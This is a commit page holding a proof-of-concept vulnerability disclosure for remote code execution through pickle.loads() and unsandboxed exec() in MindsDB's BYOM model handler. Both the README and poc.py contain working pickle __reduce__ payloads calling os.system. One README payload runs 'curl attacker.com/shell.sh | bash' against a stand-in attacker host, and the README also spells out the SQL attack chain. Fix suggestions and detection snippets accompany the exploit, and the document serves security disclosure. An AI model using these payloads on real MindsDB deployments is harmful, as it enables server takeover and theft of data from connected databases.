vellaveto committed on
Commit fda4aa3 · verified · 1 Parent(s): b093227

PoC: MindsDB BYOM Handler — pickle.loads + exec() RCE

Files changed (2)
  1. README.md +136 -0
  2. poc.py +29 -0
README.md ADDED
@@ -0,0 +1,136 @@
# MindsDB — RCE via `pickle.loads()` in BYOM (Bring Your Own Model) Handler

## Vulnerability Type
CWE-502: Deserialization of Untrusted Data

## Severity
Critical — any user who can create a BYOM model achieves remote code execution on the MindsDB server.

## Affected Code
**File:** `mindsdb/integrations/handlers/byom_handler/byom_handler.py`

Three functions deserialize user-controlled model state:

```python
# Line 398 — predict()
def predict(self, df, model_state, args):
    model_state = pickle.loads(model_state)  # ← RCE
    self.model_instance.__dict__ = model_state

# Line 407 — finetune()
def finetune(self, df, model_state, args):
    self.model_instance.__dict__ = pickle.loads(model_state)  # ← RCE

# Line 419 — describe()
def describe(self, model_state, attribute=None):
    model_state = pickle.loads(model_state)  # ← RCE
    self.model_instance.__dict__ = model_state
```

**Also affected:**

`mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:55`:
```python
model_state = pickle.loads(model_state)  # subprocess wrapper
```

`mindsdb/interfaces/query_context/context_controller.py:275`:
```python
steps_data = pickle.loads(data)  # from cache
```

`mindsdb/integrations/libs/process_cache.py:45`:
```python
# IPC via pickle — exception propagation
```

## Attack Chain

1. **Attacker creates a BYOM model** via MindsDB SQL:
   ```sql
   CREATE MODEL pwned
   PREDICT target
   USING engine = 'byom',
         code = 'class Model: pass';
   ```

2. **The model's `train()` returns `pickle.dumps(self.__dict__)`** — but an attacker who controls the model code can make that pickled state contain an object whose deserialization executes arbitrary code.

3. **When `predict()` is called** (e.g., `SELECT * FROM pwned WHERE ...`), the server deserializes the model state with `pickle.loads(model_state)`, yielding arbitrary code execution.

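Step 2 can be made concrete with a sketch of attacker-controlled model code. The class and the `train()` signature below are illustrative (the real BYOM interface may differ), and a benign callable (`len`) stands in for `os.system` so the demo is safe to run:

```python
import pickle

# Hypothetical attacker-controlled BYOM model code (illustrative; the real
# BYOM training interface may differ). Because the attacker writes this code,
# train() can return ANY bytes, including a pickle stream whose
# deserialization calls an arbitrary callable.
class Model:
    def train(self, df, target_col):
        class Payload:
            def __reduce__(self):
                return (len, ('pwned',))  # benign stand-in for (os.system, (...,))
        return pickle.dumps(Payload())

state = Model().train(None, 'target')

# The server's predict() later runs pickle.loads(state); the attacker's
# callable executes during deserialization itself, before any type checks:
result = pickle.loads(state)
print(result)  # 5: len('pwned') ran inside pickle.loads
```

The point is that the callable runs as a side effect of `pickle.loads()` itself; no method on the resulting object ever needs to be invoked.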
### Alternative: Direct state injection

If the attacker has access to the MindsDB storage backend (database), they can directly replace the model state bytes with a malicious pickle:

```python
import pickle, os

class Exploit:
    def __reduce__(self):
        return (os.system, ('curl attacker.com/shell.sh | bash',))

malicious_state = pickle.dumps(Exploit())
# Insert into model storage → next predict() = RCE
```

## AI Impact (10x Multiplier)

MindsDB is an AI-in-database platform, and the BYOM handler is specifically designed for users to bring custom ML models. Compromising it enables:

- **Model poisoning** — replace a legitimate model with a backdoored version
- **Training data exfiltration** — RCE exposes all data MindsDB can reach
- **Database compromise** — MindsDB connects to user databases (MySQL, PostgreSQL, etc.), so RCE grants access to all connected data sources
- **Supply chain** — a poisoned model persists across restarts and affects all queries

## Known CVE Context

MindsDB has prior deserialization CVEs (CVE-2024-45846, CVE-2024-45847 — eval injection via the Weaviate integration). This BYOM `pickle.loads` is a different, previously unreported vector.

## Suggested Fix

Replace `pickle.loads` with a safe alternative (the serialization side in `train()` must change to match):

```python
import json

def predict(self, df, model_state, args):
    # Use JSON-based deserialization instead of pickle
    model_state = json.loads(model_state)
    # Or use a restricted unpickler:
    # model_state = RestrictedUnpickler(io.BytesIO(model_state)).load()
    self.model_instance.__dict__ = model_state
```

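The restricted unpickler mentioned in the comment can be sketched as follows. This is a minimal illustration, not a vetted mitigation: allowlist-based unpickling is brittle, and moving to a non-executable format is preferable where possible.

```python
import io
import os
import pickle

# Minimal sketch of a restricted unpickler: only explicitly allowlisted
# globals may be resolved during deserialization, so a payload that tries
# to reach os.system (or any other callable) is rejected, not executed.
SAFE_GLOBALS = {
    ('builtins', 'dict'),
    ('builtins', 'list'),
    ('builtins', 'set'),
}

class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if (module, name) in SAFE_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f'blocked global: {module}.{name}')

def safe_loads(data: bytes):
    return RestrictedUnpickler(io.BytesIO(data)).load()

# Plain data structures round-trip fine (their opcodes never hit find_class):
print(safe_loads(pickle.dumps({'weights': [1, 2, 3]})))

# An os.system payload is rejected instead of executed:
class Exploit:
    def __reduce__(self):
        return (os.system, ('id',))

try:
    safe_loads(pickle.dumps(Exploit()))
except pickle.UnpicklingError as e:
    print('rejected:', e)
```

Note that `find_class` is the single choke point pickle offers; everything not on the allowlist, including `os.system`, raises before any code runs.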
## Invariant Violated
S16 (DeserializationGuard): Application MUST NOT use `pickle.loads` on data from user-controlled or shared storage.

## Additional Finding: Direct `exec()` on User Model Code

**File:** `mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:80`

```python
def import_string(code, module_name='model'):
    module = types.ModuleType(module_name)
    exec(code, module.__dict__)  # ← Direct code execution, NO sandbox
    return module
```

This is the execution path for BYOM models. When a user creates a model with `engine='byom'`, their Python code is passed to `import_string()`, which calls `exec()` with no sandboxing, no AST filtering, and no import restrictions.

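To make the "no AST filtering" point concrete, here is roughly what even a minimal pre-check would look like. This sketch is illustrative only: a Python denylist is not a sandbox and is trivially bypassed (e.g. via `__import__` or `getattr`), so it should not be read as a fix.

```python
import ast

# Illustrative only: a denylist-based AST walk that rejects imports of a
# few dangerous modules before code is exec()'d. This is NOT a sandbox;
# it merely shows the kind of check import_string() lacks entirely.
BLOCKED_MODULES = {'os', 'subprocess', 'socket', 'ctypes'}

def check_model_code(code: str) -> None:
    tree = ast.parse(code)
    for node in ast.walk(tree):
        if isinstance(node, ast.Import):
            names = [alias.name.split('.')[0] for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [(node.module or '').split('.')[0]]
        else:
            continue
        bad = BLOCKED_MODULES.intersection(names)
        if bad:
            raise ValueError(f'blocked import(s): {sorted(bad)}')

check_model_code('class Model: pass')            # passes silently
try:
    check_model_code('import os\nos.system("id")')
except ValueError as e:
    print(e)
```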
The same file also uses `pickle.loads()` for IPC (stdin/stdout between parent and worker):

```python
def decode(encoded):
    return pickle.loads(encoded)  # Line 55

def get_input():
    with open(0, 'rb') as fd:
        encoded = fd.read()
    obj = decode(encoded)  # pickle.loads on stdin
    return obj
```

### Combined Chain
1. User creates a BYOM model with malicious code → `exec(code)` → RCE
2. Even if `exec()` were sandboxed, the pickle IPC channel is unprotected → `pickle.loads` bypass

This is a **defense-in-depth failure** — two independent RCE vectors in the same module.
poc.py ADDED
@@ -0,0 +1,29 @@
"""MindsDB BYOM Handler — pickle.loads RCE PoC

The BYOM (Bring Your Own Model) handler deserializes user-uploaded
model state via pickle.loads() without any safety checks.

Affected: mindsdb/integrations/handlers/byom_handler/byom_handler.py:398
Also: mindsdb/integrations/handlers/byom_handler/proc_wrapper.py:80 (exec on user code)
"""
import pickle
import os

class MaliciousModel:
    """When this object is unpickled, it executes arbitrary code."""
    def __reduce__(self):
        return (os.system, ('id > /tmp/pwned',))

# This is what happens when a user creates a BYOM model:
# the model state is pickle.dumps'd during train() and pickle.loads'd during predict().
malicious_state = pickle.dumps(MaliciousModel())

print(f"Malicious pickle payload: {len(malicious_state)} bytes")
print("When MindsDB calls predict() on this model, pickle.loads(model_state) triggers RCE")
print()
print("Attack chain:")
print("1. CREATE MODEL pwned USING engine='byom', code='<malicious model code>'")
print("2. SELECT * FROM pwned WHERE input='test' -- triggers predict()")
print("3. predict() calls pickle.loads(model_state) → RCE")
print()
print("Additionally, proc_wrapper.py:80 calls exec(code) on the model code directly")
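A safe way to confirm what the payload would do, without ever executing it, is to disassemble the pickle stream with the standard-library pickletools module (disassembly only reads opcodes; it never runs the payload):

```python
import io
import os
import pickle
import pickletools

class MaliciousModel:
    def __reduce__(self):
        return (os.system, ('id > /tmp/pwned',))

payload = pickle.dumps(MaliciousModel())

# Disassemble the pickle stream: the STACK_GLOBAL opcode resolving
# os.system and the REDUCE opcode that calls it are plainly visible.
out = io.StringIO()
pickletools.dis(payload, out=out)
listing = out.getvalue()
print('system' in listing, 'REDUCE' in listing)  # True True
```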